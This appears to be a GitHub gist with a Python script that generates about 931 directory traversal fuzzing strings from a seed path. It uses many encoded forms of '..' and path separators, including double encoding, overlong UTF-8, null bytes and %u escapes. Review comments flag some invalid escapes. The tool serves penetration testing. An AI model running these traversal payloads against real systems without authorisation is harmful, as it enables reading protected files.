@haccer
Created September 8, 2018 23:45
An overkill directory traversal fuzzing-wordlist generator.
#!/usr/bin/env python3
# An overkill directory traversal fuzzing wordlist generator.
# Creates approx. 931 items.
import base64
import sys
import urllib.parse
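# Seed path to mutate, taken from the first command-line argument.
# Exit with a usage line instead of an IndexError traceback when it is missing.
if len(sys.argv) < 2:
    sys.exit(f"usage: {sys.argv[0]} <seed-path>")
string = sys.argv[1]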
# Stand-ins for the ".." path component, taken from dotdotpwn.
# Each entry is a byte sequence that a lenient or multi-pass decoder may turn
# back into dots, so a path check only holds if it runs after the final decode.
# Order is significant: it determines the order of the generated output.
dots = [
    "..",
    ".%00.",
    "..%00",
    "..%01",
    ".?",
    "??",
    "?.",
    "%5C..",
    ".%2e",
    "%2e.",
    ".../.",
    "..../",
    "%2e%2e",  # plain percent-encoding of ".."
    "%%c0%6e%c0%6e",
    "0x2e0x2e",  # hex-literal notation rather than a percent escape
    "%c0.%c0.",
    "%252e%252e",  # "%2e%2e" with the "%" itself encoded (double encoding)
    "%c0%2e%c0%2e",
    "%c0%ae%c0%ae",  # overlong 2-byte UTF-8 form of "."
    "%c0%5e%c0%5e",
    "%c0%ee%c0%ee",
    "%c0%fe%c0%fe",
    "%uff0e%uff0e",  # %u escape for U+FF0E (fullwidth full stop)
    "%%32%%65%%32%%65",
    "%e0%80%ae%e0%80%ae",  # overlong 3-byte UTF-8 form of "."
    "%25c0%25ae%25c0%25ae",  # overlong 2-byte form with "%" encoded
    "%f0%80%80%ae%f0%80%80%ae",  # overlong 4-byte UTF-8 form of "."
    "%f8%80%80%80%ae%f8%80%80%80%ae",  # 5-byte form (outside modern UTF-8)
    "%fc%80%80%80%80%ae%fc%80%80%80%80%ae",  # 6-byte form (outside modern UTF-8)
    "%u002e",  # %u escape for a single "."
]
# Stand-ins for the path separators "/" and "\".
# Order is significant: it determines the order of the generated output.
slashes = [
    "/",
    "\\",
    "%2f",  # percent-encoded "/"
    "%5c",  # percent-encoded "\"
    "0x2f",  # hex-literal notation rather than a percent escape
    "0x5c",
    "%252f",  # "%2f" with the "%" itself encoded (double encoding)
    "%255c",
    "%c0%2f",
    "%c0%af",  # overlong 2-byte UTF-8 form of "/"
    "%c0%5c",
    "%c1%9c",  # overlong 2-byte UTF-8 form of "\"
    # NOTE(review): the entries below containing p, v, q, s or g are not valid
    # hex escapes; they are reproduced unchanged -- presumably as they appear
    # in the upstream list, confirm before "correcting" them.
    "%c1%pc",
    "%c0%9v",
    "%c0%qf",
    "%c1%8s",
    "%c1%1c",
    "%c1%af",
    "%bg%qf",
    "%u2215",  # %u escape for U+2215 (division slash)
    "%u2216",  # %u escape for U+2216 (set minus)
    "%uEFC8",  # %u escape for a private-use code point
    "%uF025",  # %u escape for a private-use code point
    "%%32%%66",
    "%%35%%63",
    "%e0%80%af",  # overlong 3-byte UTF-8 form of "/"
    "%25c1%259c",  # "%c1%9c" with "%" encoded
    "%25c0%25af",  # "%c0%af" with "%" encoded
    "%f0%80%80%af",  # overlong 4-byte UTF-8 form of "/"
    "%f8%80%80%80%af",  # 5-byte form (outside modern UTF-8)
]
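# Build the wordlist: the seed itself, then every separator substitution and
# every dot substitution, alone and combined.  Duplicates are expected (the
# "/" separator reproduces a seed that only uses "/") and are dropped before
# printing.
#
# NOTE(review): str.replace() rewrites every single "." in the seed, while
# the entries of `dots` mostly stand for "..".  A seed that contains ".."
# therefore expands to a doubled sequence, and dots inside file names are
# rewritten too -- confirm the seed form this script expects.
_list = [string]

for slash in slashes:
    # Both separator styles in the seed map to the same replacement.
    _list.append(string.replace("/", slash).replace("\\", slash))
    for dot in dots:
        dotted = string.replace(".", dot)
        _list.append(dotted)
        # The separator swap runs after the dot swap, so a "/" that belongs
        # to a dots entry (".../.", "..../") is rewritten as well.
        _list.append(dotted.replace("/", slash).replace("\\", slash))

# Base64 of the unmodified seed is added once, after all substitutions.
_list.append(base64.b64encode(bytes(string, "utf-8")).decode())

# dict.fromkeys() de-duplicates while keeping first-seen order.
for i in dict.fromkeys(_list):
    print(i)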